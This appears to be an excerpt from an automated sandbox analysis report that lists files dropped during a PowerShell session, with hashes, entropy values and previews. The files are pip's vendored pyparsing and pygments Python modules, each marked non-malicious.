                              Preview:""". pygments.util. ~~~~~~~~~~~~~.. Utility functions... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import re.from io import TextIOWrapper...split_path_re = re.compile(r'[/\\ ]').doctype_lookup_re = re.compile(r'''. <!DOCTYPE\s+(. [a-zA-Z_][a-zA-Z0-9]*. (?: \s+ # optional in HTML5. [a-zA-Z_][a-zA-Z0-9]*\s+. "[^"]*")?. ). [^>]*>.''', re.DOTALL | re.MULTILINE | re.VERBOSE).tag_re = re.compile(r'<(.+?)(\s.*?)?>.*?</.+?>',. re.IGNORECASE | re.DOTALL | re.MULTILINE).xml_decl_re = re.compile(r'\s*<\?xml[^>]*\?>', re.I)...class ClassNotFound(ValueError):. """Raised if one of the lookup functions didn't find a matching class."""...class OptionError(Exception):. """. This exception will be raised by all option processing functions if. the type or value of the argument is not correct.. """..def get_choice_opt(options, optname, allowed, default=Non
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):9116
                              Entropy (8bit):4.974975272378704
                              Encrypted:false
                              SSDEEP:192:QwQHTFk4g4LXEKMPtUJHJkh8iJFMYy5hwJVcTFA+YpaZVT17t3gkHwt:TKGDYEBPtr/vPy5hwJSTFgpaZVT1tgky
                              MD5:54BDE372F6FA7D187103AB99F7F41E16
                              SHA1:8278D2C0279CD14EB27B1F487BBE415B7E7E620D
                              SHA-256:F66D496C4D894CB7411B431BE81D2511A663D7CD56C7972E3D7669B1B1C46201
                              SHA-512:3E4ACA49007B813DCC513BCA0FA7F20D516C1B2A722B46FB0750698E953B4A7D6F7DA926311561104839D51E6B583ECDB19BD8DEECB49E656A599CF5C304756B
                              Malicious:false
                              Preview:# module pyparsing.py.#.# Copyright (c) 2003-2022 Paul T. McGuire.#.# Permission is hereby granted, free of charge, to any person obtaining.# a copy of this software and associated documentation files (the.# "Software"), to deal in the Software without restriction, including.# without limitation the rights to use, copy, modify, merge, publish,.# distribute, sublicense, and/or sell copies of the Software, and to.# permit persons to whom the Software is furnished to do so, subject to.# the following conditions:.#.# The above copyright notice and this permission notice shall be.# included in all copies or substantial portions of the Software..#.# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):7922
                              Entropy (8bit):5.678046876294754
                              Encrypted:false
                              SSDEEP:192:649k4g4LXEKMPtUJHJkh8s4Exe1jHLx+MieM:+DYEBPtrj01jrx+M/M
                              MD5:D6F224ADE516395DCB687931537BE941
                              SHA1:6B8B9D0D373B73E0B3F474B57686D239E7EDEBD0
                              SHA-256:C2FD55ABC2DA47258F9348F279B26B772A4F16D2FB9BACAEFF183966F50BAC27
                              SHA-512:C06A1421A249FBE7198224099308FAE991527EBF2BA9AEF631E9480B4E4C76503A4E59F4842A036D4EAFDCE3A02040F12D54E97F6A8E0A84BF38EBC8F4CB4F46
                              Malicious:false
                              Preview:........=.Cf.#........................T.....d.Z.d.d.l.m.Z.....G.d...d.e.........Z...e.d.d.d.d.d.........Z.d.Z.e.j...................Z.e.Z.d.Z.d.d.l.....d.d.l.....d.d.l.....d.d.l.m.Z.m.Z...d.d.l.....d.d.l.....d.d.l.m.Z...d.d.l.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d...e.........v.r.e.Z.d...e.........v.r.e.Z.d...e.........v.r.e.Z.e.e.e.z...z...Z.g.d...Z.y.).a.....pyparsing module - Classes and methods to define and execute parsing grammars.=============================================================================..The pyparsing module is an alternative approach to creating and.executing simple grammars, vs. the traditional lex/yacc approach, or the.use of regular expressions. With pyparsing, you don't need to learn.a new syntax for defining grammars or matching expressions - the parsing.module provides a library of classes that you use to construct the.grammar directly in Python...Here is a program to parse "Hello, World!" (or any greeting of the form.``"<sa
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):8406
                              Entropy (8bit):5.447264799254796
                              Encrypted:false
                              SSDEEP:96:bMRQ0Dr8Cx+qZ1PnLNXuXVS8/asbSRKScTluFOPhTJJ2M/HgScYGZhM9j74SnVJA:bLKLMJo2XjFYk7Q7u/NGX/T
                              MD5:43DBFC8496578F620C03AB968D921D66
                              SHA1:36EFA00F88D55BB0B7A3EB905158E310890CA6F4
                              SHA-256:C482EC34CD1084F0AD8DCBE4271FF6B1E6FB8B98769C03B993CDDD27563AB59B
                              SHA-512:333598A47E3551468727DC7B504F89BB9C1CABC5C93DB5927661C315799933677268E3E9B67FB883E8F8153040E4C84C42B22DE04589F96650B7841DA8543452
                              Malicious:false
                              Preview:........=.Cf................................d.d.l.m.Z...d.d.l.m.Z.m.Z.....G.d...d.........Z.d...Z.d...Z.d...Z.d...Z...e.........e._.........d.d...Z...e.e.........d...........Z...e.e.........d...........Z...e.e.........d...........Z...e.e.........d...........Z...e.e.........d...........Z.y.)......)...ParseException)...col..replaced_by_pep8c.....................".....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.y.)...OnlyOncezI. Wrapper for parse actions, to ensure they are only called once.. c.....................8.....d.d.l.m.}.....|.|.........|._.........d.|._.........y.).Nr....)..._trim_arityF)...corer......callable..called)...self..method_callr....s.... .iC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pyparsing/actions.py..__init__z.OnlyOnce.__init__....s........%..#.K..0................c.....................l.....|.j...................s.|.j...................|.|.|.........}.d.|._.........|.S.t.........|.|.d...........).NTz.OnlyOnce obj called multiple
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):13425
                              Entropy (8bit):5.728283406249044
                              Encrypted:false
                              SSDEEP:192:/u2M/HYVaL/xpkZEzbTg39xnxUMY92Yd8mld3ZH:+AabxpkZEzbTgNLvGDZH
                              MD5:248D201A0900CAC4EB567662096926B0
                              SHA1:AABF6E54EB3B9D671FC1587B880C56172713B06D
                              SHA-256:296723D9C50899E828A73348738C4C65701C1226E9F13B1C1227892180FBB315
                              SHA-512:1DFFFF7C0AE04953DB27200AE827D065F51097CB3BD1B8B45BAE83452ADFE75BC44161DA7E25BEE70651A9DA83DDBE1A12E3B3A6B721ACC4A694352EF92B34C8
                              Malicious:false
                              Preview:........=.CfK4.............................d.d.l.....d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.....G.d...d.........Z...e.e.........j...........................D...c.g.c.]...}...e.|.e.........s...|.......c.}.Z.y.c...c.}.w.)......)...*)...DelimitedList..any_open_tag..any_close_tag.....)...datetimec..........................e.Z.d.Z.d.Z...e.e.........Z.....e.e.........Z.....e.e.........j...................d.........j...................e.........Z.....e.e.........j...................d.........j.....................e.e.d.................Z.....e.d.........j...................d.........j...................e.........Z.....e.........j...................e.........d.z.....e.........j...................e.........z...j...................d.........Z...e.j'..................d.............e.e...e...e.d.........j+..........................e.z...........z...z...j...................d.........Z...e.j'..................e.............e.d.........j...................d.........j...................e.........Z.....e.d....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):267719
                              Entropy (8bit):5.4925481359095985
                              Encrypted:false
                              SSDEEP:6144:eYdVmwhqO+MwZo/04nh9xx8ZvOFGY6EXWg+5mLTnYw:3BtTFXV3/R
                              MD5:6713869A9D55FEC2CCF56DDA4BFFEC2D
                              SHA1:C517E740A84CBB783C0DB2A6214125E6083837A9
                              SHA-256:CBB512335E4761F4128B7105A589734AFD1D98EC3C869CB2D099ABB4684A59BD
                              SHA-512:4F76B3906418FDFE806674B38C215C15B136AEE72EB3908C3465A83C163F5CA23C720C99A4A932F176659434199EB4C76F5AC41AACD5C9BDB38E77696E5522A1
                              Malicious:false
                              Preview:........=.Cf.l..............................U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"..d.d.l#m$Z$..d.d.l%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,m-Z.m/Z0m1Z1..d.d.l2....d.d.l3....d.d.l4m5Z5m6Z6..d.d.l7m8Z8..e.jr..................Z:e;e<f.Z=e.e>d.f.....e?d.<...e.j...................d.k\..r.d.d.l.mAZA..n...G.d...d.........ZA..G.d...d.e(........ZB..G.d...d.e(........ZC..G.d...d.e.........ZDd.eDd.d.f.d...ZEd.eDd.d.f.d...ZFd.d ..ZG[(d!e.j4..................e;....d"e.j...................e;....d.eIf.d#..ZJ..eJe.j...................e.j...................j...................d$................r...eG..........eNeOePeQeReSeTeUeVeWeXh.ZYe.j...................Z[e.e\e.f.....Z]e.e5e.e5....f.....Z^e.e.g.e.f.....e.e5g.e.f.....e.e\e5g.e.f.....e.e;e\e5g.e.f.....f.....Z_e.e.g.eIf.....e.e5g.eIf.....e.e\e5g.eIf.....e.e;e\e5g.eIf.....f.....Z`e.e;e\d%eag.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):13005
                              Entropy (8bit):5.301496080596066
                              Encrypted:false
                              SSDEEP:192:o8F/iVovk/Q2TXTeScmcrbwSavk/OYLP3kAXnQloP1DTmuu:o8F/iTQ1S3Gblb5MAXn7PpNu
                              MD5:411D2C5C93892C49BECB9EA6354DADB7
                              SHA1:2EE4D860765BB5BDD5381969A6439B4CFA4E2577
                              SHA-256:4DBD8074FF73A76118BD9F98111CF315F4C97D3AA52DE910696BCC9767F11734
                              SHA-512:A55E529689835694563EDE640BA138CE3A83CAE834B58D6C372BB9D4CBA1A2009A9481C645C668B83D99E3DC4F355FBCC6598F82C48B2E1FB061A76DC70939D4
                              Malicious:false
                              Preview:........=.Cf3%.............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....G.d...d.e.j...................e.j...................e.j...................e.j...................e.j ..........................Z...e.e.j$..........................Z...e.j(..................d.e.z...d.z...........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.)......N.....)...col..line..lineno.._collapse_string_to_ranges..replaced_by_pep8)...pyparsing_unicodec...........................e.Z.d.Z.y.)...ExceptionWordUnicodeN)...__name__..__module__..__qualname__........lC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pyparsing/exceptions.pyr....r........s.........r....r....z.([z.]{1,16})|.c...........................e.Z.d.Z.U.d.Z.e.e.d.<...e.e.d.<...e.e.d.<...e.j...................e.d.<...e.j...................e.e.e.j...................e.....f.....e.d.<...d.Z.......d.d.e.d.e.d.e.j..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):48512
                              Entropy (8bit):5.535368686783821
                              Encrypted:false
                              SSDEEP:768:r4xqkg8Bp1U0UHMYDqHCdVozNGwxMAOrKPMntbj34TqQmMxODX/mR:0xO8D6DHTHdVozNGyMHeq2x
                              MD5:D0C440B40063469AEC1EAED119B63A03
                              SHA1:776BAEBEC7C19F3AE3300B51F7E6B1A06F1E6B39
                              SHA-256:175F4DE4E01E0F36E1F29410C95337C31DC7F215694022A2C6B6D4C24D663BE8
                              SHA-512:6B9B06E73997F10BB0E30E73E8A2D129F8D9BC555D027E22973975BDFA0A78B73946F422900638811B3B4A853E69C9A4E3A4ED341256B47968DB711330B4218E
                              Malicious:false
                              Preview:........=.Cf...............................U.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.....d.d.l.m.Z.m.Z.m.Z.m.Z.....dcd.d...d.e.d.e.j...................e.....d.e.j...................e.....d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.......ddd.d.d...d.e.e.j&..................e.....e.f.....d.e.d.e.d.e.d.e.d.e.d.e.f.d...Z.d.e.d.e.d.e.f.d...Z...ded.d...d.e.d.e.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d ..Z.d!d"d...e.........f...e.........d#..d$e.e.e.f.....d%e.e.e.f.....d&e.j...................e.....d'e.d(e.d.e.f.d)..Z...e.d*..........e.d+........f.d,..Z.d-e.e.e.f.....d.e.e.e.f.....f.d...Z d-e.e.e.f.....d.e.e.e.f.....f.d/..Z!e.e"d0<...e.e"d1<.....e ..e#e$e%d2z...........jM..................d3................\...Z'Z(e.jR..................jT..................jW..........................D.....c.i.c.]...\...}.}.|.jY..................d4........|.......c.}.}.Z-..e.d5d6j_..................e-........z...d7z...........jM..................d8........Z0d9..Z1..G.d:..d;e2........Z3e.e.e.e.e.e.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):34121
                              Entropy (8bit):5.3578034256352245
                              Encrypted:false
                              SSDEEP:768:qL8EfUpFfbxFi57O9euql15LMB8tIRMW1UdK:qgEfgxO7O9euqlHLldW1UdK
                              MD5:0020C668F53682EFAAD375F30B8A5B21
                              SHA1:C3204F977EF2D12901E80F8762785D4A1351E7C6
                              SHA-256:4A33B45F0E0DDEDBA2AF6642B8FD8820FC11D7FFCCDBB6F3E96FAEC2D0CA418D
                              SHA-512:E976D301E2CE8B550E1EFA0B735192F217B2203AFE790AED6C6D71BF51FDFA06AFB8FD66C2D6FB43E8C1B65EFDF63CDCF3F78EDCFAA010BE91306404BF700D11
                              Malicious:false
                              Preview:........=.CfDh..............................U.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...e.e.f.Z.e.e.d.f.....e.d.<.....e.d...d.D.................Z...G.d...d.........Z...G.d...d.........Z...e.j,..................e.............e.j,..................e...........y.)......)...MutableMapping..Mapping..MutableSequence..Iterator..Sequence..ContainerN)...Tuple..Any..Dict..Set..List...str_typec................#.... ...K.....|.]...}.|...........y...w...N..)....0.._s.... .iC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pyparsing/results.py..<genexpr>r........s............a.....s........r....c.....................J.....e.Z.d.Z.U.e.d.e.f.....e.d.<...d.g.Z.d.d.d.e.f.d...Z.d...Z.d...Z.d...Z.y.)..._ParseResultsWithOffset..ParseResults..tup..p1..p2c...........................|.|.f.|._.........y.r......r....)...selfr....r....s.... r......__init__z _ParseResultsWithOffset.__init__....s........0.".X.........c..................... .....|.j...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):17199
                              Entropy (8bit):5.438413632012282
                              Encrypted:false
                              SSDEEP:384:mxnip+k8x5Nb71JoQdBi7fAwNz4ULU6vf6tGukrHMpv/v/qIErc:mxnLpJolRzBvfMGuqo/Hq9rc
                              MD5:2ACB3BF32CAF3F7E2548E38E5930B352
                              SHA1:00905F5D3C1FD6FCE24AC95CA54E4E06BA69C2A3
                              SHA-256:1097E6527FC4F0A0C1D56BFDE41EC24B06FF955993587A78FFAFAE834FF06DC7
                              SHA-512:8CEE185449C3B9D21F5695DD88A9835462037E2F1612D4A06EFD18EC1BFFFAAE4FC23654425CDC0B278777FCBBCEA7D9C05793A6A3B806A8E5310B5C8CE23149
                              Malicious:false
                              Preview:........=.Cf.4........................H.....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.....G.d...d.........Z.y.)......)...contextmanagerN.....)...ParserElement..ParseException..Keyword..__diag__..__compat__c...........................e.Z.d.Z.d.Z...G.d...d.........Z...G.d...d.........Z.e.............d.d.e.d.e.j...................e.....d.e.j...................e.....d.e.d.e.d.e.j...................e.....d.e.j...................e.....d.e.f.d...........Z.y.)...pyparsing_testzB. namespace class for classes useful in writing unit tests. c.....................4.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)..&pyparsing_test.reset_pyparsing_contexta..... Context manager to be used when writing unit tests that modify pyparsing config values:. - packrat parsing. - bounded recursion parsing. - default whitespace characters.. - default keyword characters. - literal string auto-conversion class. - __diag__ settings.. Example::
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):13195
                              Entropy (8bit):5.404930062699287
                              Encrypted:false
                              SSDEEP:192:H27eq9bn+mGPDqY2xhPVVUksf1c3uI1GNkGFaYAln8WPaRoYw36G075re8APPNYX:H273pxcDM1UxrMwoYZp7LYF8
                              MD5:41A84123FB726325DE04B99E9CC82529
                              SHA1:4870FDAF1712E1797B9FE270426DDA40402BD595
                              SHA-256:371DBF067520D095C6533C44494D58A9C88C8FC71FB80A0E66331795BDE19F4C
                              SHA-512:FC6AF5871E3C0412858AAA635AA11FD70AE71765651CFD29FCAB2D35E358AFC848F8E1E4744472E764ACB811FDE0F12B4A7DE85F59C11A6E8C432AA93B382AF8
                              Malicious:false
                              Preview:........=.Cf.).............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.....G.d...d.........Z.e.e.e.e.e.f.....e.e.....f.........Z...G.d...d.........Z...G.d...d.e.........Z.y.)......N)...filterfalse)...List..Tuple..Unionc...........................e.Z.d.Z.d...Z.d...Z.y.)..._lazyclasspropertyc.....................V.....|.|._.........|.j...................|._.........|.j...................|._.........y.).N)...fn..__doc__..__name__)...selfr....s.... .iC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pyparsing/unicode.py..__init__z._lazyclassproperty.__init__....s.................z.z....................c.....................(...........t.........|...........t...........d.........r!t...........f.d.....j...................d.d...D.................r.i..._.........|.j...................j...................}.|...j...................v.r.|.j...............................j...................|.<.....j...................|.....S.).N.._internc.............
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):14915
                              Entropy (8bit):5.199848002888309
                              Encrypted:false
                              SSDEEP:192:0vukHfLsjDxv9xjOfbUTAMQ5xsU2PB/tGxCZU13tvTLxgq/EOkd6MO7Zm:QukHfLmQxsbPBYxC6n4jeZm
                              MD5:FE6EED76C6B162F7A9725CDE8C6942BF
                              SHA1:8EF545F7D71EB44884A5E2D6AD663024E32C6C89
                              SHA-256:139C99704A870D15483AF2E55CD98D800FC462921D112DF71F5F96C0EB1F3DA0
                              SHA-512:7148C5D64EE895EE3FA442D148912E98568C2B657F35A37EC50C53AE1D0EB201ED96DEAAC900D969A32FB6B21E58378707110E526089C5FF1CAC996E94187EA7
                              Malicious:false
                              Preview:........=.Cf.!..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.........Z...e.d.e...........Z...G.d...d.........Z...e.d...........d.e.d.e.d.e.f.d...........Z...e.d...........d.e.d.e.d.e.f.d...........Z...e.d...........d.e.d.e.d.e.f.d...........Z...G.d...d.........Z...G.d...d.........Z...G.d...d.........Z...G.d...d.e.........Z.d.e.d.e.f.d...Z...d#d.e.e.e.e.....f.....d.e.d.e.f.d...Z.d.e d.e f.d...Z!d.e.d e.d.e.f.d!..Z"d e.d.e.e.g.e.f.....f.d"..Z#y.)$.....N)...lru_cache..wraps)...Callable..List..Union..Iterable..TypeVar..cast.\.....C)...boundc.....................r.....e.Z.d.Z.U.d.Z.g.Z.e.e.....e.d.<...g.Z.e.e.....e.d.<...d.Z.e.d...........Z...e.d...........Z...e.d...........Z.y.)...__config_flagsz=Internal class for defining compatibility and debugging flags.._all_names.._fixed_names..configurationc.....................>.....|.|.j...................v.rYt.........j...................|.j.....................d.|...d.|
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):6567
                              Entropy (8bit):4.704950034201965
                              Encrypted:false
                              SSDEEP:96:HIb2SjGNsVS8/asbyQKScTYeFOPhTJJ2M/HgScYGZhl7Zz74SnVJB39uDBvQ:HRNUJyQ28NjFY/Zz7V39utQ
                              MD5:97193C1C00ED32DF51CF2E57385B514E
                              SHA1:9C417653572B6956BE49AFB31BFED33F25E51E0D
                              SHA-256:D39B9A20F3B39C93D0ED5811766182986E2C0E750FB7082FE6A39822A6CBD946
                              SHA-512:4F246D6F4178F297B2AD1E613D149BCADF00824401357EF5C84D1140FF2398A7482FB5544313667372A78ABB903B68E4824C7EF6365258349E5F55F5AA6E9C00
                              Malicious:false
                              Preview:# actions.py..from .exceptions import ParseException.from .util import col, replaced_by_pep8...class OnlyOnce:. """. Wrapper for parse actions, to ensure they are only called once.. """.. def __init__(self, method_call):. from .core import _trim_arity.. self.callable = _trim_arity(method_call). self.called = False.. def __call__(self, s, l, t):. if not self.called:. results = self.callable(s, l, t). self.called = True. return results. raise ParseException(s, l, "OnlyOnce obj called multiple times w/out reset").. def reset(self):. """. Allow the associated parse action to be called once more.. """.. self.called = False...def match_only_at_col(n):. """. Helper method for defining parse actions that require matching at. a specific column in the input text.. """.. def verify_col(strg, locn, toks):. if col(locn, strg) != n:. raise ParseException(
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):13387
                              Entropy (8bit):4.8693639130340305
                              Encrypted:false
                              SSDEEP:384:gAabxpkZEzbTgNfLZcQ0YwZaV1HRWk8nTtp:gpvSNYZqWkop
                              MD5:168A86BEE8A62563BD1B46047449F40C
                              SHA1:693942EDCC014F997CB8BF451270C01A025B4D0C
                              SHA-256:A7EDDCF37139F838E5905DF91B43BDFA48D0469A1E8CFFB6FF3D21C59F9EA25E
                              SHA-512:8D0E5D4AE8EF116372B33B54D5039C99896B43EC800A63C8FF71AF3E5C544B5E779A7EDB9BB7EBAD2D7B3DC156B61AA19FC3F8106B9BF30A253DBA242F1D7CA5
                              Malicious:false
                              Preview:# common.py.from .core import *.from .helpers import DelimitedList, any_open_tag, any_close_tag.from datetime import datetime...# some other useful expressions - using lower-case class name since we are really using this as a namespace.class pyparsing_common:. """Here are some common low-level expressions that may be useful in. jump-starting parser development:.. - numeric forms (:class:`integers<integer>`, :class:`reals<real>`,. :class:`scientific notation<sci_real>`). - common :class:`programming identifiers<identifier>`. - network addresses (:class:`MAC<mac_address>`,. :class:`IPv4<ipv4_address>`, :class:`IPv6<ipv6_address>`). - ISO8601 :class:`dates<iso8601_date>` and. :class:`datetime<iso8601_datetime>`. - :class:`UUID<uuid>`. - :class:`comma-separated list<comma_separated_list>`. - :class:`url`.. Parse actions:.. - :class:`convert_to_integer`. - :class:`convert_to_float`. - :class:`convert_to_date`. - :class:`convert_to_dat
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):224445
                              Entropy (8bit):4.478174379962787
                              Encrypted:false
                              SSDEEP:6144:8K6XzXqrQE0EYwyoy5uXhT2xnPyGGO8WWUe/LYJp2VdcxrF+yPCZjW:bBGGBUe8jLyW
                              MD5:2A9FD56192E64C5710762B67AD987F43
                              SHA1:5E8FFC7AE9B2BE2FA70C726FCD183ED8D9588CE0
                              SHA-256:CAFB9194BA57485F26824F908625B73952EA0FD4F4AEC8FDB5B89B8511F861AC
                              SHA-512:F3FF27FE9D6618CD3FC45C3AD3A0C6B2C75B0B568136998CD8FC1C9B758FF03441875C635A79B1447CE8BE11012A56488153AD06572A6FC18076596AA0EC9F6E
                              Malicious:false
                              Preview:#.# core.py.#..from collections import deque.import os.import typing.from typing import (. Any,. Callable,. Generator,. List,. NamedTuple,. Sequence,. Set,. TextIO,. Tuple,. Union,. cast,.).from abc import ABC, abstractmethod.from enum import Enum.import string.import copy.import warnings.import re.import sys.from collections.abc import Iterable.import traceback.import types.from operator import itemgetter.from functools import wraps.from threading import RLock.from pathlib import Path..from .util import (. _FifoCache,. _UnboundedCache,. __config_flags,. _collapse_string_to_ranges,. _escape_regex_range_chars,. _bslash,. _flatten,. LRUMemo as _LRUMemo,. UnboundedMemo as _UnboundedMemo,. replaced_by_pep8,.).from .exceptions import *.from .actions import *.from .results import ParseResults, _ParseResultsWithOffset.from .unicode import pyparsing_unicode.._MAX_INT = sys.maxsize.str_type: Tuple[type, ...] = (str, bytes)..#.# Copy
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):24215
                              Entropy (8bit):4.458805804079613
                              Encrypted:false
                              SSDEEP:384:LLzwwHHRVUeF/RTkSFAX3EQVbCrq614OPtL5cMKrEG6AvS+Cn:LLzwwHx2eF/RTkS6X3EQp21BNcMI/662
                              MD5:4D006D53065A73CAEF44E879DC744F0D
                              SHA1:6E1A3C885FBC3D5DEC270791AB81C64D9660EC8B
                              SHA-256:9F19833A8605F4D5EE2DA198CB4D6D2858E4351796265AC616E24D584893A3CE
                              SHA-512:572E8A1E5EF6180967A04460DE9A70465983C379E97C2EB7D4ED51BEE8055C5A7C052B7E5DC260572B5AC90AFB4C3DCAE0CEC3F7849E6CE65712BB78AB0AFE93
                              Malicious:false
                              Preview:# mypy: ignore-errors.import railroad.from pip._vendor import pyparsing.import typing.from typing import (. List,. NamedTuple,. Generic,. TypeVar,. Dict,. Callable,. Set,. Iterable,.).from jinja2 import Template.from io import StringIO.import inspect...jinja2_template_source = """\.{% if not embed %}.<!DOCTYPE html>.<html>.<head>.{% endif %}. {% if not head %}. <style>. .railroad-heading {. font-family: monospace;. }. </style>. {% else %}. {{ head | safe }}. {% endif %}.{% if not embed %}.</head>.<body>.{% endif %}.{{ body | safe }}.{% for diagram in diagrams %}. <div class="railroad-group">. <h1 class="railroad-heading">{{ diagram.title }}</h1>. <div class="railroad-description">{{ diagram.text }}</div>. <div class="railroad-svg">. {{ diagram.svg }}. </div>. </div>.{% endfor %}.{% if not embed %}.</body>.</html>.{% endif %}."""..template = Template(ji
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):26824
                              Entropy (8bit):5.1984627697995
                              Encrypted:false
                              SSDEEP:384:hGrI3W6twfAPsed+Y0bCe+ItMyo7jyN4OPpFMZrdPB4b:h8I3W6taAPsDpbp6yUjiLSdPBe
                              MD5:96D52AF68B2D5F3DED34244E0634E7DF
                              SHA1:D5DB69503D6E2B634F15FA36BDD239ACC3F40DFD
                              SHA-256:1A3C042D91A8D8616D45654C7B86D29A78DD0C282DF5F5638B66FA14A35D372A
                              SHA-512:305B88965C351C0B6EDF639DF54E2CD5F91981DE2866FC36B39C653965ABF76383E8857422BEB4B4EB916F78FC918368A9BB1B2B24E5F96733B2AEC1905EC901
                              Malicious:false
                              Preview:........=.Cf.^..............................d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.Z...e.e.........Z...e.d.d.e.f.d.e.j(..................e.j*......................f.d.e.f.g.........Z.....e.d.........Z...G.d...d.e.j2..........................Z...G.d...d.e.j2..........................Z...G.d...d.e.e.............Z.d,d.e.e.....d.e.f.d...Z.d.d.d.e.f.d...Z.........d-d.e.j>..................d.e.j(..................e ....d.e.d.e!d.e!d.e.e.....f.d...Z"d.e.d.e.e.j>......................d.e!f.d ..Z#..G.d!..d"........Z$..G.d#..d$........Z%d.e.j>..................d.e!f.d%..Z&d&..Z'd.e.e.j>......................f.d'..Z(e'............d.d.e.j>..................d(e.j(..................e.....d)e%d.e.d.e.d*e.d.e!d.e!d.e.j(..................e.....f.d+..........Z)y.)/.....N)...pyparsing)...List..NamedTuple..Generic..TypeVar..Dict..Callable..Set..Iterable)...Template)...StringIOa....{% if not embed %}.<!DOCTYPE html>.<html>.<head>.{% endif %}.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):9523
                              Entropy (8bit):4.350560699979647
                              Encrypted:false
                              SSDEEP:192:AwQZVA6dvk/Rh5ULmzBBMbVxtzvk/OYHtolo2:AjZVN+RvUKjMhobj2
                              MD5:D766F5ADC5EEA0117932CCE82A2574A5
                              SHA1:33F826B5F61CB81EACA0761A76D4C5BF3FD29DED
                              SHA-256:E8973A5B5783641CF216ED49D18ADC74D155042F9120DBA3666BDE4A707C471C
                              SHA-512:6974C8D151ECEF30145FE784D0BA61A68B2C67EDE5C686241232192D6BE0D01301B3C2B9363A4C20D3383BD8250AE51A75764B4ABB033532A3B0F08DDC6983AE
                              Malicious:false
